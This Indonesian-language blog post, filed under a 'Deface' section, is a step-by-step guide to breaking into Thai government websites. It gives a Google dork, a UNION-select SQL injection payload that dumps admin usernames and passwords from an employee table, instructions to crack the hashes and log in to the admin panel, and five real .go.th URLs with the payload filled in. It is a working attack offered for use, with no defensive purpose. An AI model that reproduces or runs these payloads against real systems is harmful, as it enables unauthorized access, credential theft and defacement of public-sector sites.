You are here
Home > Deface

Thailand Government SQL Injection Vulnerability

Thailand government sql injection vulnerability

Situs – situs pemerintahan thailand, banyak sekali yang memiliki kerentanan dan mudah diinjeksi. Hanya cukup dengan melakukan sql injection, kalian dapat menyusupi database dari situs target.

Vuln ini sebenarnya sudah lama ditemukan dan saya pun pernah membuat write upnya di laman facebook, namun entah kenapa tidak ada perbaikan dari pihak admin website pemerintah thailand. Dan bukan cuma satu dua, tapi hampir semua situs masih dapat disusupi menggunakan sql injection.

Tanpa perlu tools seperti havij dan sqlmap, ataupun injeksi secara manual. Disini saya akan memberi dork beserta exploit yang akan langsung mengkuak database websitenya.

Dork: inurl:plantype_id= main.php
Exploit: -69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-

Gatau apa itu dork? Baca artikel Google hacking gan. Kalo udah, yuk langsung aja

1.Dorking menggunakan dork diatas
Thailand government sql injection vulnerability

2.Terus buka – bukain deh situsnya
Thailand government sql injection vulnerability

3.Kemudian ganti angka pada plantype_id= menggunakan exploit, contohnya adalah http://www.tessabanuthai.go.th/main.php?page=plan&plantype_id=8 menjadi http://www.tessabanuthai.go.th/main.php?page=plan&plantype_id=-69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
Thailand government sql injection vulnerability

4.Setelah itu akan muncul username dan password akun admin dari situs itu, kalau ga muncul inject sendiri coba gan. Trus decrypt password tersebut sampai berhasil ga berhasil ya lewatin
Thailand government sql injection vulnerability

5.Login dengan username dan password yang sudah di decrypt tadi di /administrator/login.php
Thailand government sql injection vulnerability

Demo site:

  • http://www.khunpadpeng.go.th/main.php?page=plan2&plantype_id=-69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
  • http://www.bangplama.go.th/main.php?page=plan&plantype_id=-22+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
  • http://www.bankae.go.th/main.php?page=plan&plantype_id=-69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
  • http://www.jorakhesamphan.go.th/main.php?page=plan&plantype_id=-22+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
  • http://www.wangdaeng.go.th/main.php?page=plan2&plantype_id=9-69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
0N3R1D3R
Founder Indonesia To World Team
https://www.indonesiatoworld.org

Berlangganan via email

Ketik email:


Tinggalkan Balasan

Top